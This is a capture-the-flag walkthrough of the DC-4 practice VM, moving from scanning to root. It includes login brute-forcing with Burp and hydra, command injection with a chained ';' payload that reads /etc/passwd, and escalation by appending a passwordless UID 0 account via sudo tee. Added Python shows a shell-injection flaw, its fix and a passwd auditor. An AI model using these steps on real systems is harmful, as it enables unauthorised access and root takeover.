Lluna's Pure land.


DC-4

0x00. Official description

DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.

As with DC-3, there are no hints; there is only one final flag.

0x01. As usual, start with nmap

A ping sweep of the subnet (-sP is the old spelling of -sn: host discovery without a port scan) shows four hosts. .1 is the gateway, .2 is the physical host, .6 is the Kali box, so .3, whose MAC belongs to VMware, is our target.

```
root@JIYE:~/tmp/DC4# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 21:44 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0020s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00029s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.3
Host is up (0.00027s latency).
MAC Address: 00:0C:29:B7:2E:67 (VMware)
Nmap scan report for 192.168.1.6
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.15 seconds
```

0x02. Continue with nmap for services and ports

Only two ports are open: 22 (OpenSSH 7.4p1 on Debian 9) and 80 (nginx 1.15.10, page title "System Tools").

```
root@JIYE:~/tmp/DC4# nmap -A 192.168.1.3 -oN nmap.A
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 21:46 EDT
Nmap scan report for 192.168.1.3
Host is up (0.00034s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:B7:2E:67 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.1.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.53 seconds
```

0x03. Visit port 80

The site is nothing but an admin login form.

0x04. Brute-force the login with Burp Suite

1. Capture the request

Submitting the form through Burp's proxy shows a plain POST to /login.php with two fields, username and password:

```http
POST /login.php HTTP/1.1
Host: 192.168.1.3
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.3
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.3/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: has_js=1; SESS3d56985a7fb178e8eb469ddb59bb6550=6flnn9PeYpt0eXlfkyxJlP9vjJwA3UhQ4nszAdkawro; Drupal.toolbar.collapsed=0; PHPSESSID=cdfml2498srtgu1effus59caj4
Connection: close

username=admin&password=admin
```

2. Brute-force the password

Send the request to Intruder, mark the password value as the payload position and load a wordlist.

The wordlist used is:

/usr/share/john/password.lst

Raise the thread count so the run finishes quickly.

Start the attack and sort the results by status code or response length: the one attempt that differs from all the others is the successful login, which gives the admin password.

0x05. Log in

After logging in there are two buttons.

Click them and look at the output.

0x06. Capture the request again to see how the command is executed

The command text itself travels in the request body. Replacing it with a different system command executes just as well, so this is command injection, and running commands through it turns up several user accounts.

List the home directories.

Look inside each home directory; one of them holds an old-passwords.bak.

Save the user names and the old passwords as two wordlists for the next step:
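The pattern behind that behaviour, as an added example and not the machine's own code (the page never shows the PHP): a handler that passes request-supplied command text to a shell, beside an allow-list version that the same request cannot subvert. The command names in the allow list are constructed for the example.

```python
"""Added example (not the DC-4 PHP, which the page does not show): the
"System Tools" pattern, where the command text comes straight from the
request and is handed to a shell, beside an allow-list replacement.
"""
import subprocess


def run_vulnerable(command_from_request: str) -> str:
    """Execute whatever the client sent. With shell=True the ';', '|', '&&'
    and $(...) in the request are interpreted, so a swapped command runs."""
    proc = subprocess.run(command_from_request, shell=True,
                          capture_output=True, text=True)
    return proc.stdout


# Hardened: the client picks a key; the server owns the argv and no shell runs.
ALLOWED_COMMANDS = {          # constructed for the example
    "list": ["ls", "-l"],
    "disk": ["df", "-h"],
    "who": ["who"],
}


def run_hardened(choice: str) -> str:
    """Run only a pre-defined argv; anything outside the allow list is an error."""
    argv = ALLOWED_COMMANDS.get(choice)
    if argv is None:
        raise ValueError(f"unknown command choice: {choice!r}")
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # Constructed request value standing in for what Burp showed.
    payload = "ls -l; cat /etc/passwd"
    print(run_vulnerable(payload)[:200])
    try:
        run_hardened(payload)
    except ValueError as err:
        print("hardened:", err)
```

The fix is not escaping: once the client chooses the program, no amount of quoting helps. The client may only choose among keys, and the server never builds a shell string from them.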

```
root@JIYE:~/tmp/DC4# ls
nmap.A  nmap.sP  old-passwords.bak  users.bak
root@JIYE:~/tmp/DC4#
```

0x07. SSH brute-force

Since SSH is open, run hydra with the user list and the old-passwords list (both pulled from the target through the command injection):

```
root@JIYE:~/tmp/DC4# hydra -L users.bak -P old-passwords.bak ssh://192.168.1.3 -vV -f -o hydra.ssh
```

One user's credentials are found (-f stops at the first valid pair):

```
root@JIYE:~/tmp/DC4# cat hydra.ssh
# Hydra v9.1 run at 2020-08-22 22:49:20 on 192.168.1.3 ssh (hydra -L users.bak -P old-passwords.bak -vV -f -o hydra.ssh ssh://192.168.1.3)
[22][ssh] host: 192.168.1.3   login: jim   password: jibril04
root@JIYE:~/tmp/DC4#
```

0x08. SSH login

```
root@JIYE:~/tmp/DC4# ssh jim@192.168.1.3
jim@192.168.1.3's password:
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Aug 23 13:35:56 2020 from 192.168.1.6
jim@dc-4:~$ whoami
jim
jim@dc-4:~$
```

Looking around the home directory (the login banner said "You have mail"), there is a mailbox with a message from root. Note test.sh has the setuid bit and is world-writable, but it is owned by jim, so it grants nothing beyond jim's own privileges.

```
jim@dc-4:~$ ls -l
total 12
drwxr-xr-x 2 jim jim 4096 Apr  7  2019 backups
-rw------- 1 jim jim  528 Apr  6  2019 mbox
-rwsrwxrwx 1 jim jim  174 Apr  6  2019 test.sh
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
    (envelope-from <root@dc-4>)
    id 1hCiQe-0000gc-EC
    for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.
```

Following the same lead, check the system mail spool for other messages: /var/mail/jim holds a message from charles containing his password in clear text.

```
jim@dc-4:~$ cd /var/mail/
jim@dc-4:/var/mail$ ls -l
total 4
-rw-rw---- 1 jim mail 715 Apr  6  2019 jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
    (envelope-from <charles@dc-4>)
    id 1hCjIX-0000kO-Qt
    for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles

jim@dc-4:/var/mail$
```

0x09. Privilege escalation

1. Run sudo -l

jim is not allowed to use sudo at all:

```
jim@dc-4:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for jim:
Sorry, user jim may not run sudo on dc-4.
jim@dc-4:~$
```

2. Switch to charles

Log in as charles with the password from the mail. sudo -l shows charles may run /usr/bin/teehee as root without a password, which is the path to escalation.

```
root@JIYE:~# ssh charles@192.168.1.3
charles@192.168.1.3's password:
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:~$
```

Check teehee's options: -a appends to the given file instead of overwriting it. The help text points at the GNU coreutils tee documentation, so teehee is simply a renamed tee, and running it through sudo gives an append to any file as root.

```
charles@dc-4:~$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'
charles@dc-4:~$
```

3. Escalate via teehee

Append a line to /etc/passwd.

Each line of /etc/passwd has 7 colon-separated fields:

field 1 is the user name;

field 2 is the password field: `x` means the hash is kept in /etc/shadow, and an empty field means no password is asked for at all;

field 3 is the UID; 0 is root;

field 4 is the GID;

field 5 is the GECOS (full name / comment);

field 6 is the home directory;

field 7 is the login shell.

So we append a second UID 0 account with an empty password field, which is effectively another root. GECOS and home are left empty, so su will simply stay in the current directory rather than enter /root.

```
charles@dc-4:~$ echo "fjy::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
fjy::0:0:::/bin/bash
charles@dc-4:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Debian-exim:x:108:112::/var/spool/exim4:/bin/false
fjy::0:0:::/bin/bash
charles@dc-4:~$
```
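To make the seven-field layout and the effect of the appended line concrete, here is an added example, not code from the post: it composes the same kind of passwd line (refusing colons, which would shift every later field) and audits a passwd file for what that line leaves behind, a second UID 0 and an empty password field. The sample content is constructed from the listing above; the audit rules are the editor's, not something the page states.

```python
"""Added example (not from the original post): build the kind of line that
was appended to /etc/passwd above, and audit a passwd file for what such a
line leaves behind. SAMPLE_PASSWD is constructed from the listing in the
text; the audit rules are the editor's own.
"""
from dataclasses import dataclass
from typing import List

FIELD_COUNT = 7  # name:password:uid:gid:gecos:home:shell


@dataclass
class PasswdEntry:
    name: str
    password: str  # "x" = hash lives in /etc/shadow; "" = no password asked
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd-format text, rejecting lines that do not have 7 fields."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != FIELD_COUNT:
            raise ValueError(f"line {lineno}: expected {FIELD_COUNT} fields, got {len(parts)}")
        name, pw, uid, gid, gecos, home, shell = parts
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def make_entry(name: str, uid: int = 0, gid: int = 0, gecos: str = "",
               home: str = "", shell: str = "/bin/bash", password: str = "") -> str:
    """Compose one passwd line. A ':' inside any field would shift the rest."""
    fields = [name, password, str(uid), str(gid), gecos, home, shell]
    if any(":" in f or "\n" in f for f in fields):
        raise ValueError("passwd fields may not contain ':' or newlines")
    return ":".join(fields)


def audit(entries: List[PasswdEntry]) -> List[str]:
    """Flag a second UID 0, an empty password field, and hashes left in passwd."""
    findings = []
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: UID 0 account other than root")
        if e.password == "":
            findings.append(f"{e.name}: empty password field (su/login without a password)")
        elif e.password not in ("x", "*") and not e.password.startswith("!"):
            findings.append(f"{e.name}: password hash stored in passwd instead of shadow")
    return findings


# Constructed from the /etc/passwd listing in the text (subset).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
"""


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/passwd"
    with open(path) as fh:
        for finding in audit(parse_passwd(fh.read())) or ["no findings"]:
            print(finding)
```

Run against a live box the audit is the detection side of this trick; on an engagement, remove the appended line once you are done, since it is a passwordless root login for anyone who can reach the host.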

Switch to the new account; su asks for no password because the password field is empty, and the shell comes up as root:

```
charles@dc-4:~$ su fjy
root@dc-4:/home/charles# cd
root@dc-4:/root# ls
flag.txt
root@dc-4:/root# cat flag.txt



888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
root@dc-4:/root#
```
------------- Short note, long feelings; see you next time -------------